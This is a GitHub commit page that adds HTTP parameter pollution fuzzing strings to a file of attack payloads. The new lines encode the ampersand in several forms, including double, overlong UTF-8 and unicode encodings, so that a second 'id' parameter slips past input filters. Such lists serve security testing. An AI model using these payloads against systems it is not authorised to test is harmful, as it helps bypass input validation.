Skip to content

Commit

Permalink
Added deferent encoding techniques for the & character
Browse files Browse the repository at this point in the history
  • Loading branch information
Jacc0 committed Jul 4, 2014
1 parent 6b8f2f6 commit 36d74e2
Showing 1 changed file with 9 additions and 1 deletion.
10 changes: 9 additions & 1 deletion attack-payloads/http-protocol/hpp.fuzz.txt
Original file line number Diff line number Diff line change
Expand Up @@ -27,4 +27,12 @@
?id=/:@&=+$&id=2
?id[=/:@&=+$&id=2]=1
?id={id:{id:1},2}
?id[{id:{id[]:1},2}]=3
?id[{id:{id[]:1},2}]=3
?id=%23?id=1
?id=1%26id=2
?id=1%2526id=2
?id=1%c0%a6id=2
?id=1\uc0a6id=2
?id=1&id=2
?id=1&id=2
?id=1%u0026;id=2

0 comments on commit 36d74e2

Please sign in to comment.